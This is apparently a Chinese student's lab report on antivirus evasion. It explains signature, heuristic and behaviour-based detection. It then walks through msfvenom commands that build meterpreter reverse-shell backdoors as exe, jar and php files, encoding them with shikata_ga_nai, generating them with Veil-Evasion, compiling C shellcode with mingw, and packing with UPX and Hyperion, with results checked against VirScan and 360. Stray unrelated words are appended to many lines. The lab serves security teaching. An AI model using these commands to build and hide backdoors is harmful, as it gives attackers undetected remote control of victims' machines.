1.1 正確使用msf編碼器(0.5分),msfvenom生成如jar之類的其餘文件(0.5分),veil-evasion(0.5分),加殼工具(0.5分),使用shellcode編程(1分)php
1.2 經過組合應用各類技術實現惡意代碼免殺(0.5分)html
殺軟是如何檢測出惡意代碼的?java
答:主要包括三個方面:shell
基於特徵碼的檢測:特徵碼就是一段或多端數據,若是一個可執行文件(或者運行的庫、腳本等)包含這樣的數據就會被認爲是惡意代碼編程
啓發式惡意軟件檢測:若是一個軟件在幹通是常惡意軟件乾的事,看起來就像個惡意軟件,那麼就把它看成一個惡意軟件吧(偷笑.jpg)vim
基於行爲的惡意軟件檢測:屬於啓發式的一種,加入了行爲監控windows
免殺是作什麼?安全
答:經過修改惡意軟件或惡意代碼讓其可以不被殺毒軟件檢測出來。網絡
免殺的基本方法有哪些?tcp
答:整體技術有以下:
改變特徵碼:若是有exe文件,就對它進行加殼(壓縮、加密)、若是有shellcode,就用encode進行編碼,基於playload從新編譯生成可執行文件、若是有源代碼,用其它語言進行重寫再編譯
改變行爲:通信方式方面儘可能使用反彈鏈接、隧道技術、通信數據加密,操做模式方面最好基於內存操做、減小對系統的修改、加入混淆做用的正常功能代碼
很是規的辦法:使用一個有漏洞的應用當成後門,社會工程學(無敵)、純手工打造一個惡意軟件
開啓殺軟能絕對防止電腦中惡意代碼嗎?
這裏我和其它同窗同樣,使用實驗二中msf生成的簡單後門程序放到virscan網站中進行掃描(文件名還不能開頭爲數字),發現這個未經處理的後門不堪重任。
使用360衛士對它進行掃描:
而後按照老師上課時的步驟,對這個文件進行屢次編碼,使用到的指令以下:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.1.123 LPORT=5320 -f exe > coded10.exe
拿新生成的文件去驗一下貨,結果是一頓操做猛如虎,一看戰績0槓5,花裏胡哨罷了,並無什麼卵用
拿360衛士對它進行掃描
msfvenom生成如jar之類的其餘文件
msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.1.123 lport=5320 x> 20165320_backdoor_java.jar
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.123 lport=443 x> backdoor5320.php
PS:我以爲整個實驗最難的部分就是veil的安裝了,調試了一個晚上也沒能成功,不是安裝Python3.4的時候出錯,就是卡在展開對象的位置,最後仍是拷了同窗的虛擬機,總而言之,裝東西仍是隨緣
安裝後(拷完虛擬機後),命令行中輸入veil
進入控制界面
輸入use evasion
進入evasion
輸入use c/meterpreter/rev_tcp.py
開始對後門程序設置相關的參數
而後設置反彈回連的IP、端口號
設置完參數以後輸入generate
生成後門程序
拿veil生成的文件放到virscan進行掃描測試:
用360對它進行掃描,表示很無辜的被發現了
從新回到原來的Kali虛擬機,在命令行中輸入命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.123 LPORT=5320 -f c
用c語言生成一段shellcode
vim一個以下的.c文件
使用命令i686-w64-mingw32-g++ bcak20165320.c -o back20165320.exe
生成一個可執行文件
將該文件拷到virscan網站上進行掃描
將該文件用360進行掃描,出乎意料地發現這麼簡單的操做360竟然發現不了
雖然360掃描的時候沒發現問題,執行的時候仍是被抓住了
對剛剛生成的半手工shellcode程序加上一個壓縮殼,使用指令 upx 源文件 -o 目標文件
放入virscan文件中檢測一下
執行的時候360直接發現
嘗試對半手工shellcode程序加上一個加密殼,將上例的文件放入到/usr/share/windows-binaries/hyperion/
目錄,進入該目錄,使用命令wine hyperion.exe -v 源文件 目標文件
添加加密殼的文件仍是不能經過virscan網站的檢測,也不能經過360的掃描
有兩種方法:一種是經過將veil生成的文件進行加殼操做、還有一種是經過將shellcode放入本機的C語言編譯器,進行編譯運行(經過參考大佬們的博客發現的,並且,頗有可能過一兩天就不行了,供上一張截圖)